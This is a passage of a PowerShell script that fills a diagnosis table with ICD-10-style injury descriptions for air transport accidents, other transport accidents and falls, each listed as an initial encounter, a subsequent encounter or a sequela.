$DiagnosisList.Rows.Add("Other ultralight, microlight or powered-glider accident injuring occupant","Other ultralight, microlight or powered-glider accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other ultralight, microlight or powered-glider accident injuring occupant","Other ultralight, microlight or powered-glider accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified accident to other private fixed-wing aircraft, injuring occupant","Unspecified accident to other private fixed-wing aircraft, injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified accident to other private fixed-wing aircraft, injuring occupant","Unspecified accident to other private fixed-wing aircraft, injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified accident to other private fixed-wing aircraft, injuring occupant","Unspecified accident to other private fixed-wing aircraft, injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft crash injuring occupant","Other private fixed-wing aircraft crash injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft crash injuring occupant","Other private fixed-wing aircraft crash injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft crash injuring occupant","Other private fixed-wing aircraft crash injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Forced landing of other private fixed-wing aircraft injuring occupant","Forced landing of other private fixed-wing aircraft injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of other private fixed-wing aircraft injuring occupant","Forced landing of other private fixed-wing aircraft injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of other private fixed-wing aircraft injuring occupant","Forced landing of other private fixed-wing aircraft injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft collision injuring occupant","Other private fixed-wing aircraft collision injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft collision injuring occupant","Other private fixed-wing aircraft collision injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft collision injuring occupant","Other private fixed-wing aircraft collision injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft fire injuring occupant","Other private fixed-wing aircraft fire injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft fire injuring occupant","Other private fixed-wing aircraft fire injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft fire injuring occupant","Other private fixed-wing aircraft fire injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft explosion injuring occupant","Other private fixed-wing aircraft explosion injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft explosion injuring occupant","Other private fixed-wing aircraft explosion injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other private fixed-wing aircraft explosion injuring occupant","Other private fixed-wing aircraft explosion injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other accident to other private fixed-wing aircraft injuring occupant","Other accident to other private fixed-wing aircraft injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident to other private fixed-wing aircraft injuring occupant","Other accident to other private fixed-wing aircraft injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident to other private fixed-wing aircraft injuring occupant","Other accident to other private fixed-wing aircraft injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified accident to commercial fixed-wing aircraft injuring occupant","Unspecified accident to commercial fixed-wing aircraft injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified accident to commercial fixed-wing aircraft injuring occupant","Unspecified accident to commercial fixed-wing aircraft injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified accident to commercial fixed-wing aircraft injuring occupant","Unspecified accident to commercial fixed-wing aircraft injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft crash injuring occupant","Commercial fixed-wing aircraft crash injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft crash injuring occupant","Commercial fixed-wing aircraft crash injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft crash injuring occupant","Commercial fixed-wing aircraft crash injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Forced landing of commercial fixed-wing aircraft injuring occupant","Forced landing of commercial fixed-wing aircraft injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of commercial fixed-wing aircraft injuring occupant","Forced landing of commercial fixed-wing aircraft injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of commercial fixed-wing aircraft injuring occupant","Forced landing of commercial fixed-wing aircraft injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft collision injuring occupant","Commercial fixed-wing aircraft collision injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft collision injuring occupant","Commercial fixed-wing aircraft collision injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft collision injuring occupant","Commercial fixed-wing aircraft collision injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft fire injuring occupant","Commercial fixed-wing aircraft fire injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft fire injuring occupant","Commercial fixed-wing aircraft fire injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft fire injuring occupant","Commercial fixed-wing aircraft fire injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft explosion injuring occupant","Commercial fixed-wing aircraft explosion injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft explosion injuring occupant","Commercial fixed-wing aircraft explosion injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Commercial fixed-wing aircraft explosion injuring occupant","Commercial fixed-wing aircraft explosion injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other accident to commercial fixed-wing aircraft injuring occupant","Other accident to commercial fixed-wing aircraft injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident to commercial fixed-wing aircraft injuring occupant","Other accident to commercial fixed-wing aircraft injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident to commercial fixed-wing aircraft injuring occupant","Other accident to commercial fixed-wing aircraft injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified spacecraft accident injuring occupant","Unspecified spacecraft accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified spacecraft accident injuring occupant","Unspecified spacecraft accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified spacecraft accident injuring occupant","Unspecified spacecraft accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Spacecraft crash injuring occupant","Spacecraft crash injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Spacecraft crash injuring occupant","Spacecraft crash injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Spacecraft crash injuring occupant","Spacecraft crash injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Forced landing of spacecraft injuring occupant","Forced landing of spacecraft injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of spacecraft injuring occupant","Forced landing of spacecraft injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of spacecraft injuring occupant","Forced landing of spacecraft injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Spacecraft collision injuring occupant","Spacecraft collision injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Spacecraft collision injuring occupant","Spacecraft collision injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Spacecraft collision injuring occupant","Spacecraft collision injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Spacecraft fire injuring occupant","Spacecraft fire injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Spacecraft fire injuring occupant","Spacecraft fire injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Spacecraft fire injuring occupant","Spacecraft fire injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Spacecraft explosion injuring occupant","Spacecraft explosion injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Spacecraft explosion injuring occupant","Spacecraft explosion injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Spacecraft explosion injuring occupant","Spacecraft explosion injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other spacecraft accident injuring occupant","Other spacecraft accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other spacecraft accident injuring occupant","Other spacecraft accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other spacecraft accident injuring occupant","Other spacecraft accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other powered aircraft accidents injuring occupant","Other powered aircraft accidents injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other powered aircraft accidents injuring occupant","Other powered aircraft accidents injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other powered aircraft accidents injuring occupant","Other powered aircraft accidents injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified aircraft accident injuring occupant","Unspecified aircraft accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified aircraft accident injuring occupant","Unspecified aircraft accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified aircraft accident injuring occupant","Unspecified aircraft accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified balloon accident injuring occupant","Unspecified balloon accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified balloon accident injuring occupant","Unspecified balloon accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified balloon accident injuring occupant","Unspecified balloon accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Balloon crash injuring occupant","Balloon crash injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Balloon crash injuring occupant","Balloon crash injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Balloon crash injuring occupant","Balloon crash injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Forced landing of balloon injuring occupant","Forced landing of balloon injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of balloon injuring occupant","Forced landing of balloon injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of balloon injuring occupant","Forced landing of balloon injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Balloon collision injuring occupant","Balloon collision injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Balloon collision injuring occupant","Balloon collision injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Balloon collision injuring occupant","Balloon collision injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Balloon fire injuring occupant","Balloon fire injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Balloon fire injuring occupant","Balloon fire injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Balloon fire injuring occupant","Balloon fire injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Balloon explosion injuring occupant","Balloon explosion injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Balloon explosion injuring occupant","Balloon explosion injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Balloon explosion injuring occupant","Balloon explosion injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other balloon accident injuring occupant","Other balloon accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other balloon accident injuring occupant","Other balloon accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other balloon accident injuring occupant","Other balloon accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified hang-glider accident injuring occupant","Unspecified hang-glider accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified hang-glider accident injuring occupant","Unspecified hang-glider accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified hang-glider accident injuring occupant","Unspecified hang-glider accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Hang-glider crash injuring occupant","Hang-glider crash injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Hang-glider crash injuring occupant","Hang-glider crash injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hang-glider crash injuring occupant","Hang-glider crash injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Forced landing of hang-glider injuring occupant","Forced landing of hang-glider injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of hang-glider injuring occupant","Forced landing of hang-glider injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of hang-glider injuring occupant","Forced landing of hang-glider injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Hang-glider collision injuring occupant","Hang-glider collision injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Hang-glider collision injuring occupant","Hang-glider collision injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hang-glider collision injuring occupant","Hang-glider collision injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Hang-glider fire injuring occupant","Hang-glider fire injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Hang-glider fire injuring occupant","Hang-glider fire injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hang-glider fire injuring occupant","Hang-glider fire injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Hang-glider explosion injuring occupant","Hang-glider explosion injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Hang-glider explosion injuring occupant","Hang-glider explosion injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hang-glider explosion injuring occupant","Hang-glider explosion injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other hang-glider accident injuring occupant","Other hang-glider accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other hang-glider accident injuring occupant","Other hang-glider accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other hang-glider accident injuring occupant","Other hang-glider accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified glider (nonpowered) accident injuring occupant","Unspecified glider (nonpowered) accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified glider (nonpowered) accident injuring occupant","Unspecified glider (nonpowered) accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified glider (nonpowered) accident injuring occupant","Unspecified glider (nonpowered) accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) crash injuring occupant","Glider (nonpowered) crash injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) crash injuring occupant","Glider (nonpowered) crash injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) crash injuring occupant","Glider (nonpowered) crash injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Forced landing of glider (nonpowered) injuring occupant","Forced landing of glider (nonpowered) injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of glider (nonpowered) injuring occupant","Forced landing of glider (nonpowered) injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of glider (nonpowered) injuring occupant","Forced landing of glider (nonpowered) injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) collision injuring occupant","Glider (nonpowered) collision injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) collision injuring occupant","Glider (nonpowered) collision injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) collision injuring occupant","Glider (nonpowered) collision injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) fire injuring occupant","Glider (nonpowered) fire injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) fire injuring occupant","Glider (nonpowered) fire injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) fire injuring occupant","Glider (nonpowered) fire injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) explosion injuring occupant","Glider (nonpowered) explosion injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) explosion injuring occupant","Glider (nonpowered) explosion injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Glider (nonpowered) explosion injuring occupant","Glider (nonpowered) explosion injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other glider (nonpowered) accident injuring occupant","Other glider (nonpowered) accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other glider (nonpowered) accident injuring occupant","Other glider (nonpowered) accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other glider (nonpowered) accident injuring occupant","Other glider (nonpowered) accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other nonpowered-aircraft accidents injuring occupant","Other nonpowered-aircraft accidents injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other nonpowered-aircraft accidents injuring occupant","Other nonpowered-aircraft accidents injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other nonpowered-aircraft accidents injuring occupant","Other nonpowered-aircraft accidents injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nonpowered-aircraft accident injuring occupant","Unspecified nonpowered-aircraft accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified nonpowered-aircraft accident injuring occupant","Unspecified nonpowered-aircraft accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified nonpowered-aircraft accident injuring occupant","Unspecified nonpowered-aircraft accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Occupant of aircraft injured in other specified air transport accidents","Occupant of aircraft injured in other specified air transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant of aircraft injured in other specified air transport accidents","Occupant of aircraft injured in other specified air transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant of aircraft injured in other specified air transport accidents","Occupant of aircraft injured in other specified air transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from aircraft","Person injured while boarding or alighting from aircraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from aircraft","Person injured while boarding or alighting from aircraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured while boarding or alighting from aircraft","Person injured while boarding or alighting from aircraft, sequela") + $null = $DiagnosisList.Rows.Add("Parachutist entangled in object","Parachutist entangled in object, initial encounter") + $null = $DiagnosisList.Rows.Add("Parachutist entangled in object","Parachutist entangled in object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Parachutist entangled in object","Parachutist entangled in object, sequela") + $null = $DiagnosisList.Rows.Add("Parachutist injured on landing","Parachutist injured on landing, initial encounter") + $null = $DiagnosisList.Rows.Add("Parachutist injured on landing","Parachutist injured on landing, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Parachutist injured on landing","Parachutist injured on landing, sequela") + $null = $DiagnosisList.Rows.Add("Other parachutist accident","Other parachutist accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other parachutist accident","Other parachutist accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other parachutist accident","Other parachutist accident, sequela") + $null = $DiagnosisList.Rows.Add("Hit by object falling from aircraft","Hit by object falling from aircraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit by object falling from aircraft","Hit by object falling from aircraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit by object falling from aircraft","Hit by object falling from aircraft, sequela") + $null = $DiagnosisList.Rows.Add("Injured by rotating propeller","Injured by rotating propeller, initial encounter") + $null = $DiagnosisList.Rows.Add("Injured by rotating propeller","Injured by rotating propeller, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injured by rotating propeller","Injured by rotating propeller, sequela") + $null = $DiagnosisList.Rows.Add("Sucked into jet engine","Sucked into jet engine, initial encounter") + $null = $DiagnosisList.Rows.Add("Sucked into jet engine","Sucked into jet engine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sucked into jet engine","Sucked into jet engine, sequela") + $null = $DiagnosisList.Rows.Add("Other injury to person on ground due to air transport accident","Other injury to person on ground due to air transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury to person on ground due to air transport accident","Other injury to person on ground due to air transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury to person on ground due to air transport accident","Other injury to person on ground due to air transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Civilian aircraft involved in air transport accident with military aircraft","Civilian aircraft involved in air transport accident with military aircraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Civilian aircraft involved in air transport accident with military aircraft","Civilian aircraft involved in air transport accident with military aircraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Civilian aircraft involved in air transport accident with military aircraft","Civilian aircraft involved in air transport accident with military aircraft, sequela") + $null = $DiagnosisList.Rows.Add("Civilian injured by military aircraft","Civilian injured by military aircraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Civilian injured by military aircraft","Civilian injured by military aircraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Civilian injured by military aircraft","Civilian injured by military aircraft, sequela") + $null = $DiagnosisList.Rows.Add("Other air transport accident involving military aircraft","Other air transport accident involving military aircraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other air transport accident involving military aircraft","Other air transport accident involving military aircraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other air transport accident involving military aircraft","Other air transport accident involving military aircraft, sequela") + $null = $DiagnosisList.Rows.Add("Other air transport accidents, not elsewhere classified","Other air transport accidents, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other air transport accidents, not elsewhere classified","Other air transport accidents, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other air transport accidents, not elsewhere classified","Other air transport accidents, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving cable-car, not on rails","Accident to, on or involving cable-car, not on rails, initial encounter") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving cable-car, not on rails","Accident to, on or involving cable-car, not on rails, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving cable-car, not on rails","Accident to, on or involving cable-car, not on rails, sequela") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving land-yacht","Accident to, on or involving land-yacht, initial encounter") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving land-yacht","Accident to, on or involving land-yacht, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving land-yacht","Accident to, on or involving land-yacht, sequela") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving ice yacht","Accident to, on or involving ice yacht, initial encounter") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving ice yacht","Accident to, on or involving ice yacht, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving ice yacht","Accident to, on or involving ice yacht, sequela") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving ski lift","Accident to, on or involving ski lift, initial encounter") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving ski lift","Accident to, on or involving ski lift, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accident to, on or involving ski lift","Accident to, on or involving ski lift, sequela") + $null = $DiagnosisList.Rows.Add("Other specified transport accidents","Other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified transport accidents","Other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified transport accidents","Other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified transport accident","Unspecified transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified transport accident","Unspecified transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified transport accident","Unspecified transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level due to ice and snow","Fall on same level due to ice and snow, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level due to ice and snow","Fall on same level due to ice and snow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level due to ice and snow","Fall on same level due to ice and snow, sequela") + $null = $DiagnosisList.Rows.Add("Fall from stairs and steps due to ice and snow","Fall from stairs and steps due to ice and snow, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from stairs and steps due to ice and snow","Fall from stairs and steps due to ice and snow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from stairs and steps due to ice and snow","Fall from stairs and steps due to ice and snow, sequela") + $null = $DiagnosisList.Rows.Add("Other fall from one level to another due to ice and snow","Other fall from one level to another due to ice and snow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other fall from one level to another due to ice and snow","Other fall from one level to another due to ice and snow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other fall from one level to another due to ice and snow","Other fall from one level to another due to ice and snow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fall due to ice and snow","Unspecified fall due to ice and snow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified fall due to ice and snow","Unspecified fall due to ice and snow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified fall due to ice and snow","Unspecified fall due to ice and snow, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling without subsequent striking against object","Fall on same level from slipping, tripping and stumbling without subsequent striking against object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling without subsequent striking against object","Fall on same level from slipping, tripping and stumbling without subsequent striking against object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling without subsequent striking against object","Fall on same level from slipping, tripping and stumbling without subsequent striking against object, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified object","Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified object","Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified object","Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified object, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against sharp glass","Fall on same level from slipping, tripping and stumbling with subsequent striking against sharp glass, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against sharp glass","Fall on same level from slipping, tripping and stumbling with subsequent striking against sharp glass, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against sharp glass","Fall on same level from slipping, tripping and stumbling with subsequent striking against sharp glass, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against power tool or machine","Fall on same level from slipping, tripping and stumbling with subsequent striking against power tool or machine, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against power tool or machine","Fall on same level from slipping, tripping and stumbling with subsequent striking against power tool or machine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against power tool or machine","Fall on same level from slipping, tripping and stumbling with subsequent striking against power tool or machine, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against other sharp object","Fall on same level from slipping, tripping and stumbling with subsequent striking against other sharp object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against other sharp object","Fall on same level from slipping, tripping and stumbling with subsequent striking against other sharp object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against other sharp object","Fall on same level from slipping, tripping and stumbling with subsequent striking against other sharp object, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified sharp object","Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified sharp object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified sharp object","Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified sharp object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified sharp object","Fall on same level from slipping, tripping and stumbling with subsequent striking against unspecified sharp object, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against furniture","Fall on same level from slipping, tripping and stumbling with subsequent striking against furniture, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against furniture","Fall on same level from slipping, tripping and stumbling with subsequent striking against furniture, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against furniture","Fall on same level from slipping, tripping and stumbling with subsequent striking against furniture, sequela") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against other object","Fall on same level from slipping, tripping and stumbling with subsequent striking against other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on same level from slipping, tripping and stumbling with subsequent striking against other object","Fall on same level from slipping, tripping and stumbling with subsequent striking against other object, subsequent encounter") + $null = 